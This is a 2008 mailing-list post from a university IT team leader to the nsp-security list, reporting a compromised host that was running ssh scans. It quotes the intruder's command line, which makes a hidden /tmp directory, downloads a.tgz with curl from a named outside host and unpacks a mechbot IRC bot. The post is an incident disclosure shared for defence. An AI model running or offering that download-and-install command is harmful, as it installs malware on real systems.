[nsp-sec] malware on thailanda.at.ua (steadfast Chicago)
Peter Peters
P.G.M.Peters at utwente.nl
Tue Sep 23 09:51:12 EDT 2008
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
A few weeks ago we got a system doing ssh scans. Because we didn't have
any capacity to examine the system we simply shut it down. This week we
where able to examine the system.
It turned out on Aug 30 06:59 we got a new directory "/tmp/.,".
Downloaded into it was a mechbot.
mkdir /tmp/., ; cd /tmp/., ; curl -O thailanda.at.ua/a.tgz ; tar xzvf
a.tgz ; rm -rf a.tgz ; cd .a ; chmod 777 * ; chmod +x * ; nano mech.session
It appears the malware is still up on thailanda.at.ua.
- --
Peter Peters, Teamleider Unix/Linux-Beheer
ICT-Servicecentrum
Universiteit Twente, Postbus 217, 7500 AE Enschede
Telefoon 053 489 2301, Fax 053 489 2383,
P.G.M.Peters at utwente.nl, http://www.utwente.nl/icts
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFI2PRQelLo80lrIdIRAvVAAKCrzKW+jE8NmXKxdREZJQe2Fic4QACfalx6
QHjpETw/fYfbtBxTMVTQDF4=
=4X1f
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list